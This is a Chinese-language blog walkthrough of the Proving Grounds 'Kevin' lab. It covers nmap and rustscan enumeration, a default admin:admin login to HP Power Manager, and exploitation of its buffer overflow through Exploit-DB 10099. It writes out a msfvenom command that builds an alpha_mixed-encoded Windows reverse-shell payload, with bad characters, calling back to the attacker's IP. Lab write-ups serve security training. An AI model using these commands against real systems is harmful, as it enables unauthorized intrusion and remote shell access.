Proving Grounds Practice : Kevin Walkthrough

 Proving Grounds Practice : Kevin Walkthrough

Foothole (立足點 ) :

  • 相對簡單的一題, 80 Web 打開是 HP Power Manager,使用預設的 admin:admin 可以登入
  • Searchsploit 發現 Buffer overflow 塞 Payload 進去就可以拿到管理者
  • 使用 PoC 的內容方式建立 Payload 然後執行拿到 shell

PE ( 提權 ) :

  • 不用 PE,Reverse Shell 進來後就是管理者

注意事項 : 

  • 學到甚麼是 HP Power Manager,即便是 Buffer Overflow 也可能是一種塞 Payload 的利用不要錯過
  • Buffer Overflow 的建立方式學習到甚麼是 "Alphanumeric Shellcode" 與相關指令用法 [ -e x86/alpha_mixed ]
  • Payload 直接用最好用的 [ -p windows/shell_reverse_tcp ] 即可
  • PoC 有提供字符 [ badchar ],這就是使用參數 -b 帶入 PoC 所提供的相關字符即可
  • 最後使用 -c 打印出來編譯過後的程式即可
  • 這個 python2 ,還好 kali 直接使用 python2 去跑即可成功


Kali IP : 192.168.45.246

靶機 IP : 192.168.239.45


第一步 Rustscan,└─$ rustscan -a 192.168.239.45 --scripts none  --ulimit 5000 | tee rustscan



snmp 沒開,└─$ sudo nmap -sU -p 161 192.168.239.45 | tee snmp



nmap,└─$ sudo nmap -sCV -A -p 80,135,139,445,3389,3573,49153,49154,49152,49155,49158,49160 192.168.239.45 | tee nmap             

80 GoAhead WebServer,| http-title: HP Power Manager



enum4linux,└─$ enum4linux 192.168.239.45 | tee enum4linux






nmap SMB Vuln,└─$ sudo nmap -script=smb-vuln\* -p445 192.168.239.45 | tee nmap-smb

|     IDs:  CVE:CVE-2017-0143,servers (ms17-010)



測試 ns7-010 




建立 session 看看,沒有用.....GG


第二個也是......GG


最後一個也是.......GG


改玩 HP Power Manager


第一個就進去了且是管理者




用另一個試試看


GG....沒成功




開始手動測試看看

80 /



預設帳號密碼 admin:admin


測試後進去了



版本 4.2 ( Build 7 )




看看 Exploit-DB,選定 10099



參考 : https://www.exploit-db.com/exploits/10099

描述寫的跟 Metasploit 一樣, buffer OverFlow 進去就拿到 shell 了



PoC 有教你自己生成 Payload

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"



Google 搜尋 PexAlphaNum 看看,看第二個有 Metasploit 那一個



參考 : https://www.offsec.com/metasploit-unleashed/alphanumeric-shellcode/

裡面直接給了範例指令 root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/bind_tcp -e x86/alpha_mixed -f python



目前有這兩個資訊

# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"

範例 : msfvenom -a x86 --platform windows -p windows/shell/bind_tcp -e x86/alpha_mixed -f python

依樣畫葫蘆看看

msfvenom -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"  -p windows/shell_reverse_tcp LHOST=192.168.45.246 LPORT=4444 -e x86/alpha_mixed -f c



將 paylod COPY 到 10099 中取代



參考使用範例



出現 print( ... )? 錯誤,看來是個 python2 的腳本



改用 python2 跑跑看,成功跑完了



4444 進來了,whoami 確認是管理者了,跟 Metasploit 直接利用一樣的結果


留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

濫用 Windows 庫文件(Library File)

Challenge 0 - Secura(1)